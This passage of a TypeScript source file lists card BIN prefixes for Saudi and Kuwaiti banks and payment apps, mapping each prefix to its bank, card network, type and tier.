  '440630': { bank: 'الاستثمار', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '440631': { bank: 'الاستثمار', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '457840': { bank: 'الاستثمار', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '457841': { bank: 'الاستثمار', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '469616': { bank: 'الاستثمار', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '476815': { bank: 'الاستثمار', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '478295': { bank: 'الاستثمار', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '478296': { bank: 'الاستثمار', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '414478': { bank: 'ساب', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '455058': { bank: 'ساب', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '455340': { bank: 'ساب', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '455389': { bank: 'ساب', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '441658': { bank: 'STC Pay', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '459047': { bank: 'STC Pay', network: 'Visa', type: 'Credit', tier: 'Business' },
  '489022': { bank: 'STC Pay', network: 'Visa', type: 'Credit', tier: 'Rewards' },
  '489671': { bank: 'STC Pay', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '489674': { bank: 'STC Pay', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '428068': { bank: 'D360', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '431266': { bank: 'D360', network: 'Visa', type: 'Debit', tier: 'Signature' },
  '435733': { bank: 'D360', network: 'Visa', type: 'Debit', tier: 'Infinite' },
  '409735': { bank: 'Urpay', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '429004': { bank: 'Urpay', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '429018': { bank: 'Urpay', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '450657': { bank: 'Urpay', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '451111': { bank: 'Urpay', network: 'Visa', type: 'Debit', tier: 'Prepaid Classic' },
  '487404': { bank: 'Urpay', network: 'Visa', type: 'Credit', tier: 'Business' },
  '454887': { bank: 'برق', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '405913': { bank: 'نايفات', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  '478774': { bank: 'نايفات', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '422222': { bank: 'Vision Bank', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '432629': { bank: 'Emirates NBD', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '426220': { bank: 'FAB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '489458': { bank: 'FAB', network: 'Visa', type: 'Credit', tier: 'Infinite' },
};

// ==================== بطاقات Mastercard ====================
export const MASTERCARD_BINS: Record<string, BinInfo> = {
  '223379': { bank: 'الأهلي', network: 'Mastercard', type: 'Debit', tier: 'Platinum Flex' },
  '223398': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Installment' },
  '512220': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '512464': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '515530': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '517720': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '517918': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '518694': { bank: 'الأهلي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Platinum Travel' },
  '519310': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '519341': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '520430': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '520431': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '521031': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '523954': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '523968': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '523998': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '524116': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '524197': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '524388': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '525688': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '528597': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '529499': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '531153': { bank: 'الأهلي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Gold Payroll' },
  '531505': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '532034': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '532166': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '532446': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '532448': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '533964': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '534186': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '534797': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '535311': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '536369': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '536567': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World Elite Flex' },
  '536813': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '537878': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '539034': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '539035': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '540613': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '541554': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '541891': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '542806': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '544217': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '544744': { bank: 'الأهلي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '545205': { bank: 'الأهلي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Gold Payroll' },
  '546336': { bank: 'الأهلي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '546631': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '548255': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '549699': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '549954': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '552075': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '552077': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '556675': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Corporate World' },
  '556676': { bank: 'الأهلي', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '512623': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '524126': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '524266': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '542894': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '545619': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '549963': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '549964': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '554575': { bank: 'الراجحي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '529157': { bank: 'الإنماء', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '529178': { bank: 'الإنماء', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '530481': { bank: 'الإنماء', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '532720': { bank: 'الإنماء', network: 'Mastercard', type: 'Debit', tier: 'Premium' },
  '547026': { bank: 'الإنماء', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '551882': { bank: 'الإنماء', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '552363': { bank: 'الإنماء', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '223463': { bank: 'الرياض', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '232120': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '232520': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '513502': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World Business' },
  '514932': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '515750': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '517531': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '520089': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '520090': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '526084': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '527016': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World Business' },
  '527023': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '529271': { bank: 'الرياض', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '533940': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '537678': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World Business' },
  '539859': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '541679': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '541802': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '541988': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '545855': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '546319': { bank: 'الرياض', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '547657': { bank: 'الرياض', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '548322': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548323': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '558823': { bank: 'الرياض', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '559322': { bank: 'الرياض', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '512691': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '512727': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '517724': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '523615': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '523956': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '524148': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '538135': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '542747': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '547042': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '552012': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '552360': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '552444': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '555078': { bank: 'الفرنسي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '524646': { bank: 'العربي', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '530792': { bank: 'العربي', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '534480': { bank: 'العربي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid World' },
  '538776': { bank: 'العربي', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '549400': { bank: 'العربي', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '511249': { bank: 'الجزيرة', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '523041': { bank: 'الجزيرة', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '524236': { bank: 'الجزيرة', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '546924': { bank: 'الجزيرة', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '550002': { bank: 'الجزيرة', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '524205': { bank: 'الاستثمار', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '529298': { bank: 'الاستثمار', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '542373': { bank: 'الاستثمار', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '552384': { bank: 'الاستثمار', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '556579': { bank: 'الاستثمار', network: 'Mastercard', type: 'Credit', tier: 'Gold' },
  '536581': { bank: 'ساب', network: 'Mastercard', type: 'Debit', tier: 'Prepaid Business' },
  '541653': { bank: 'ساب', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '545297': { bank: 'ساب', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548979': { bank: 'ساب', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '552953': { bank: 'ساب', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '512060': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '522139': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '524165': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '530843': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '533172': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '539931': { bank: 'الأول', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '540236': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '542008': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '543199': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '543408': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '546755': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '546756': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'World Elite Flex' },
  '546757': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '547645': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Executive Business' },
  '548349': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Standard' },
  '548350': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '549799': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '552375': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '552438': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'World' },
  '557606': { bank: 'الأول', network: 'Mastercard', type: 'Debit', tier: 'Titanium' },
  '558848': { bank: 'الأول', network: 'Mastercard', type: 'Debit', tier: 'Platinum' },
  '558854': { bank: 'الأول', network: 'Mastercard', type: 'Credit', tier: 'Executive Business' },
  '223371': { bank: 'Tweeq', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '224020': { bank: 'Tweeq', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '242030': { bank: 'Tweeq', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '521661': { bank: 'Tweeq', network: 'Mastercard', type: 'Debit', tier: 'Standard' },
  '532235': { bank: 'Tweeq', network: 'Mastercard', type: 'Credit', tier: 'Platinum' },
  '541043': { bank: 'Tweeq', network: 'Mastercard', type: 'Credit', tier: 'Business' },
  '517597': { bank: 'الخليج الدولي', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '521657': { bank: 'الخليج الدولي', network: 'Mastercard', type: 'Credit', tier: 'Corporate World' },
  '539737': { bank: 'الخليج الدولي', network: 'Mastercard', type: 'Credit', tier: 'Corporate' },
  '541007': { bank: 'الخليج الدولي', network: 'Mastercard', type: 'Debit', tier: 'Prepaid World' },
  '558705': { bank: 'الخليج الدولي', network: 'Mastercard', type: 'Credit', tier: 'World Elite' },
  '534524': { bank: 'تساهيل', network: 'Mastercard', type: 'Credit', tier: 'Titanium' },
  '543884': { bank: 'تساهيل', network: 'Mastercard', type: 'Debit', tier: 'Prepaid' },
  '555567': { bank: 'تساهيل', network: 'Mastercard', type: 'Credit', tier: 'World' },
};

// ==================== بطاقات البنوك الكويتية - Visa ====================
export const KUWAIT_VISA_BINS: Record<string, BinInfo> = {
  // National Bank of Kuwait (NBK)
  '464452': { bank: 'NBK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '455015': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '455014': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '432423': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '426083': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '417768': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '415899': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '451318': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '479098': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '405873': { bank: 'NBK', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '405871': { bank: 'NBK', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '405853': { bank: 'NBK', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '405843': { bank: 'NBK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '466799': { bank: 'NBK', network: 'Visa', type: 'Credit', tier: 'Business Enhanced' },
  // Kuwait Finance House (KFH)
  '498495': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '479045': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '455018': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '450778': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '428926': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '421107': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '416835': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '400601': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '410606': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '427106': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Business' },
  '432508': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '444332': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '450777': { bank: 'KFH', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '454942': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Prepaid Platinum' },
  '485602': { bank: 'KFH', network: 'Visa', type: 'Debit', tier: 'Business' },
  // Boubyan Bank
  '490456': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '490455': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Infinite' },
  '470350': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '458815': { bank: 'Boubyan', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '443995': { bank: 'Boubyan', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '431199': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '426058': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '423195': { bank: 'Boubyan', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '422114': { bank: 'Boubyan', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '422113': { bank: 'Boubyan', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '405068': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '404919': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '413685': { bank: 'Boubyan', network: 'Visa', type: 'Credit', tier: 'UHNW' },
  '466797': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '477937': { bank: 'Boubyan', network: 'Visa', type: 'Debit', tier: 'Rewards' },
  // Burgan Bank
  '491785': { bank: 'Burgan', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '476335': { bank: 'Burgan', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '475189': { bank: 'Burgan', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '468564': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Signature' },
  '456031': { bank: 'Burgan', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '455068': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '455067': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Gold' },
  '450238': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Infinite' },
  '440711': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '438124': { bank: 'Burgan', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '438123': { bank: 'Burgan', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '415254': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '403583': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Business' },
  '402978': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '435798': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '435799': { bank: 'Burgan', network: 'Visa', type: 'Debit', tier: 'Classic' },
  // Gulf Bank
  '456778': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '456777': { bank: 'Gulf Bank', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '456776': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '448329': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '442446': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '442105': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '442104': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '431927': { bank: 'Gulf Bank', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '431475': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '431211': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '431210': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '422056': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '406430': { bank: 'Gulf Bank', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '438912': { bank: 'Gulf Bank', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  // Commercial Bank of Kuwait (CBK)
  '489015': { bank: 'CBK', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '485441': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '480944': { bank: 'CBK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '476099': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '464462': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '458550': { bank: 'CBK', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '443968': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '443967': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '441215': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '440625': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '425873': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  '424677': { bank: 'CBK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '400156': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '400155': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '478425': { bank: 'CBK', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  // Al Ahli Bank of Kuwait (ABK)
  '492190': { bank: 'ABK', network: 'Visa', type: 'Debit', tier: 'Standard' },
  '473834': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '457925': { bank: 'ABK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '455049': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '455048': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '455016': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '450902': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '428628': { bank: 'ABK', network: 'Visa', type: 'Debit', tier: 'Platinum' },
  '426669': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '423826': { bank: 'ABK', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '422431': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Standard' },
  '462824': { bank: 'ABK', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '403622': { bank: 'ABK', network: 'Visa', type: 'Debit', tier: 'Signature' },
  // Kuwait International Bank (KIB)
  '471457': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '458771': { bank: 'KIB', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '458770': { bank: 'KIB', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '458233': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '458232': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '409054': { bank: 'KIB', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '403068': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Business' },
  '404975': { bank: 'KIB', network: 'Visa', type: 'Debit', tier: 'Prepaid Purchasing' },
  '406464': { bank: 'KIB', network: 'Visa', type: 'Debit', tier: 'Infinite' },
  '413033': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Signature Business' },
  '422622': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '473990': { bank: 'KIB', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  // Warba Bank
  '457446': { bank: 'Warba', network: 'Visa', type: 'Credit', tier: 'Signature' },
  '457445': { bank: 'Warba', network: 'Visa', type: 'Debit', tier: 'Prepaid' },
  '457444': { bank: 'Warba', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '457443': { bank: 'Warba', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '457442': { bank: 'Warba', network: 'Visa', type: 'Credit', tier: 'Classic' },
  // Ahli United Bank (AUB)
  '479066': { bank: 'AUB', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '479065': { bank: 'AUB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '466719': { bank: 'AUB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  '431270': { bank: 'AUB', network: 'Visa', type: 'Credit', tier: 'Infinite' },
  // Union National Bank (UNB)
  '457778': { bank: 'UNB', network: 'Visa', type: 'Debit', tier: 'Classic' },
  '457777': { bank: 'UNB', network: 'Visa', type: 'Credit', tier: 'Gold' },
  '457776': { bank: 'UNB', network: 'Visa', type: 'Credit', tier: 'Classic' },
  '457775': { bank: 'UNB', network: 'Visa', type: 'Credit', tier: 'Platinum' },
  // Doha Bank (Kuwait branch)
  '419252': { bank: 'Doha Bank', network: 'Visa', type: 'Debit', tier: 'Electron' },
  '419251': { bank: 'Doha Bank', network: 'Visa', type: 'Credit', tier: 'Platinum' },
